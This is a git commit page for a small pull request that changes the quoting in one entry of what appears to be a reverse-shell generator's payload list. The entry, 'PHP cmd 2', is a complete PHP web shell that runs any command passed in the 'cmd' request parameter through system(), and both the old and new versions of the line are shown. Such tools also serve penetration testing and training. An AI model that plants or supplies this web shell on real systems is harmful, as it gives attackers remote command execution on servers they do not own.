Merge pull request #160 from LucasParsy/patch-1

use uniform quotes on "PHP cmd 2" payload
This commit is contained in:
Ryan Montgomery 2024-02-09 16:05:21 -05:00 committed by GitHub
commit c63238ce18
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -158,7 +158,7 @@ const reverseShellCommands = withCommandType(
},
{
"name": "PHP cmd 2",
"command": "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"<\/pre>\"; die; }?>",
"command": "<?php if(isset($_REQUEST[\"cmd\"])){ echo \"<pre>\"; $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"<\/pre>\"; die; }?>",
"meta": ["linux", "windows", "mac"]
},
{